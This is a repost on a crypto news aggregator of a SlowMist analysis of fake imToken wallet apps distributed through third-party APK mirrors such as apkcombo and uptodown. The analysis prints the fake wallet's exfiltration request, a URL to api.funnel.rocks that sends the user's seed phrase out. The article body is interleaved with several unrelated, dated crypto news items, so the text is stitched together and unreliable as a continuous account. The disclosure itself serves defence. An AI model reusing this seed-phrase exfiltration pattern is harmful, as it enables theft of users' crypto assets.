比特幣交易所 比特幣交易所
Ctrl+D 比特幣交易所
ads

Web3 假錢包第三方源調查分析:如何甄別網絡釣魚攻擊?_APK

Author:

Time:1900/1/1 0:00:00

慢霧安全團隊建議使用錢包、交易所時請認準官方下載渠道并從多方進行驗證。

原文:https://foresightnews.pro/article/h5Detail/31716

作者:山&耀

轉自:ForesightNews

背景

基于區塊鏈技術的Web3正在驅動下一代技術革命,越來越多的人開始參與到這場加密浪潮中,但Web3與Web2是兩個截然不同的世界。Web3世界是一個充滿著各種各樣的機遇以及危險的黑暗森林,身處Web3世界中,錢包則是進入Web3世界的入口以及通行證。

當你通過錢包在Web3世界中探索體驗諸多的區塊鏈相關應用和網站的過程中,你會發現在一條公鏈上每個應用都是使用錢包「登錄」;這與我們傳統意義上的「登錄」不同,在Web2世界中,每個應用之間的賬戶不全是互通的。但在Web3的世界中,所有應用都是統一使用錢包去進行「登錄」,我們可以看到「登錄」錢包時顯示的不是「LoginwithWallet」,取而代之的是「ConnectWallet」。而錢包是你在Web3世界中的唯一通行證。

新加坡將為Web3等技術提供1.5億美元基金:8月7日消息,新加坡金融管理局(MAS)在一份聲明中表示,根據新的金融部門技術和創新計劃(FSTI 3.0),未來三年將向Web3初創公司和其他技術投資1.5億美元。MAS認識到與行業合作支持Web3.0等新興技術產生的創新金融科技解決方案的重要性,MAS將公開呼吁在行業用例中使用創新技術。將提供贈款資金以支持實際試驗和商業化。

這是官方實體首次投資加密貨幣創新,MAS董事總經理Ravi Menon表示,我們期待與業界繼續合作,推進有針對性的金融創新。[2023/8/7 21:29:59]

俗話說高樓之下必有陰影,在如此火熱的Web3世界里,錢包作為入口級應用,自然也被黑灰產業鏈盯上。

在Android環境下,由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從其他途徑下載GooglePlay的應用,比如:apkcombo、apkpure等第三方下載站,這些站點往往標榜自己App是從GooglePlay鏡像下載的,但是其真實安全性如何呢?

香港將設立Web3Hub基金 陳茂波擔任該基金主席:金色財經報道,據香港中通社,香港Web3.0協會于11日成立。除了相關協會之外,香港還將設立Web3Hub基金,支持更多海外Web3.0企業落戶香港,該基金將由香港財政司司長陳茂波擔任主席,由多位來自金融科技、區塊鏈、加密貨幣等領域的專家組成管理委員會。該基金將與香港科技園、創新科技署等機構合作,為海外Web3.0企業提供一站式服務。據悉,該基金已經收到了來自美國、歐洲、新加坡等地的多個Web3.0項目的申請,涉及領域包括去中心化金融(DeFi)、非同質化代幣(NFT)、元宇宙(Metaverse)、去中心化社交媒體(Dsocial)等。該基金計劃在今年下半年開始投資并支持這些項目。[2023/4/12 13:58:25]

網站分析

Web3游戲工作室Unagi完成500萬美元種子輪融資:金色財經報道,Web3 游戲工作室 Unagi 完成500 萬美元種子輪融資,Sisu Game Ventures 領投,Sfermion、Signum Capital 和 2B Ventures 等公司參投。此次融資于今年年初結束,距離這家初創公司從 Binance Labs 獲得 420 萬美元僅幾個月的時間。Unagi 籌集的總金額為 1230 萬美元。該公司表示,新的融資使這家初創公司的估值翻了一番,但沒有透露。[2023/2/17 12:13:17]

鑒于下載途徑眾多,我們今天以apkcombo為例看看,apkcombo是一個第三方應用市場,它提供的應用據官方說大部分來源于其他正規應用商店,但事實是否真如官方所說呢?

三位高管離職后,Web3游戲Mythical Games裁員近10%:金色財經報道,作為業務重組的一部分,Web3游戲Mythical Games裁減了大約10%的員工,理由是經濟環境充滿挑戰,這家初創公司目前擁有大約321名員工。

此外,裁員的前一天,三位高管(聯合創始人Rudy Koch、首席運營官兼游戲工作室和發行負責人Matt Nutt、戰略和投資高級副總裁Chris Ko)宣布他們將離開這家初創公司。Mythical Games發言人Nate Nesbitt表示,“像所有公司一樣,我們受到了經濟衰退的影響,不得不相應地重新評估和重組我們的某些業務領域。”

去年11月,Mythical Games完成了1.5億美元C輪融資,a16z領投,使其估值達到12.5億美元。(The Block)[2022/11/5 12:19:18]

我們先看下apkcombo的流量有多大:

Coinbase Ventures發布Q3進展:投資49筆,Web3基礎設施和協議為最大投資類別:10月29日消息,Coinbase 官方博客發布三季度總結報告,文章顯示,在第三季度,Ventures 進行了創紀錄的 49 筆投資,平均每約 1.8 天就有一筆新交易。這比第二季度的 28 筆投資和第一季度的 24 筆有所增加。截至 2021 年第三季度,Ventures 投資組合規模超過 200 家公司和項目。在Coinbase Ventures六大投資類別中,協議+Web3基礎設施(29%)占比最大,次為DeFi(24%)和CeFi(18%),平臺+開發工具(15%)、NFT+元宇宙(9%)和其他(5%)。同時Coinbase Ventures還分享了監管、多鏈生態、Web3用戶體驗和NFT及鏈游的觀察。[2021/10/29 21:07:39]

據數據統計站點similarweb統計,apkcombo站點:

全球排名:1,809國家排名:7,370品類排名:168我們可以看到它的影響力和流量都非常大。它默認提供了一款chromeAPK下載插件,我們發現這款插件的用戶數達到了10W:

那么回到我們關注的Web3領域中錢包方向,用戶如果從這里下載的錢包應用安全性如何?我們拿知名的imToken錢包為例,其GooglePlay的正規下載途徑為:https://play.google.com/store/apps/details?id=im.token.app

由于很多手機不支持GooglePlay或者因為網絡問題,很多人會從這里下載GooglePlay的應用。而apkcombo鏡像站的下載路徑為:https://apkcombo.com/downloader/#package=im.token.app

上圖我們可以發現,apkcombo提供的版本為24.9.11,經由imToken確認后,這是一個并不存在的版本!證實這是目前市面上假imToken錢包最多的一個版本。

在編寫本文時imToken錢包的最新版本為2.11.3,此款錢包的版本號很高,顯然是為了偽裝成一個最新版本而設置的。

如下圖,我們在apkcombo上發現,此假錢包版本顯示下載量較大,此處的下載量應該是爬取的GooglePlay的下載量信息,安全起見,我們覺得有必要披露這個惡意App的來源,防止更多的人下載到此款假錢包。

同時我們發現類似的下載站還有如:uptodown下載地址:https://imtoken.br.uptodown.com/android

我們發現uptodown任意注冊即可發布App,這導致釣魚的成本變得極低:

錢包分析

在之前我們已經分析過不少假錢包的案例,如:2021-11-24我們披露:《慢霧:假錢包App已致上萬人被盜,損失高達十三億美元》,所以在此不再贅述。

我們僅對apkcombo提供版本為24.9.11這款假錢包進行分析,在開始界面創建錢包或導入錢包助記詞時,虛假錢包會將助記詞等信息發送到釣魚網站的服務端去,如下圖:

根據逆向APK代碼和實際分析流量包發現,助記詞發送方式:

https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助記詞>

看下圖,最早的「api.funnel.rocks」證書出現在2022-06-03,也就是攻擊開始的大概時間:

俗話說一圖勝千言,最后我們畫一個流程圖:

總結

目前這種騙局活動不僅活躍,甚至有擴大范圍的趨勢,每天都有新的受害者受騙。用戶作為安全體系最薄弱的環節,應時刻保持懷疑之心,增強安全意識與風險意識,當你使用錢包、交易所時請認準官方下載渠道并從多方進行驗證;如果你的錢包從上述鏡像站下載,請第一時間轉移資產并卸載該軟件,必要時可通過官方驗證通道核實。

同時,如需使用錢包,請務必認準以下主流錢包App官方網址:

imToken錢包:https://token.im/TokenPocket錢包:https://www.tokenpocket.pro/TronLink錢包:https://www.tronlink.org/比特派錢包:https://bitpie.com/MetaMask錢包:https://metamask.io/TrustWallet:https://trustwallet.com/請持續關注慢霧安全團隊,更多Web3安全風險分析與告警正在路上。

致謝:感謝在溯源過程中imToken官方提供的驗證支持。

由于保密性和隱私性,本文只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。更多的安全知識建議閱讀慢霧出品的《區塊鏈黑暗森林自救手冊》。

?

Tags:WEBWEB3COMAPKweb3.0幣種在中國合法嗎web3域名Buying.comMETAPK價格

幣贏交易所
爆火的ARB鏈上,這個最值得期待的項目你知道嗎?_AIF

??爆火的ARB鏈上,最值得期待的項目ArbFlokiAI即將開啟自從ArbDoge項目大火之后,也是帶動了新的市場熱點,aidoge上線就是百倍幣直接就上線的“三大”中的歐意.

1900/1/1 0:00:00
Tron(TRX)價格分析:多頭瞄準關鍵看漲突破_tron

Tron價格從0.0625美元兌美元開始新的上漲。TRX價格目前在0.0660美元和55條簡單移動平均線附近交易。4小時圖上有一個關鍵的收縮三角形形成,阻力位在0.0665美元附近.

1900/1/1 0:00:00
Iron Fish (IRON)_IRON

一、項目簡介? IronFish是一個去中心化的、基于工作量證明(PoW)、抗審查且可公開訪問的區塊鏈項目。它旨在為每筆交易提供強大的隱私保證.

1900/1/1 0:00:00
盡管宏觀風險事件迫在眉睫,BTC波動率指數仍觸及 6 周低點_LIBRA

Derebit的比特幣波動率指數(DVOL)剛剛跌至52,這是自3月8日以來的最低水平。盡管比特幣價格最近從上周觸及的31,000美元以上的10個月高點回落,但仍跌至六周多新低.

1900/1/1 0:00:00
比特幣價格在 60 分鐘內暴跌 6%,發生了什么?_比特幣

比特幣價格今天呈綠色交易,高位上漲約1,500美元。按市值計算的頂級加密貨幣也在中午左右再次嘗試30,000美元。此后不久,在不到60分鐘的時間里,BTCUSD暴跌超過6%,讓市場大跌眼鏡.

1900/1/1 0:00:00
MEV賽道初具雛形,或是下一個LSD級的機會?_MEV

Flashbots發布了Mev-Share,標志著這一賽道走入新紀元。MEV收入預計在牛市中將貢獻不少于70%的ETHStaking收入,這或許是下一個LSD級別的賽道.

1900/1/1 0:00:00
ads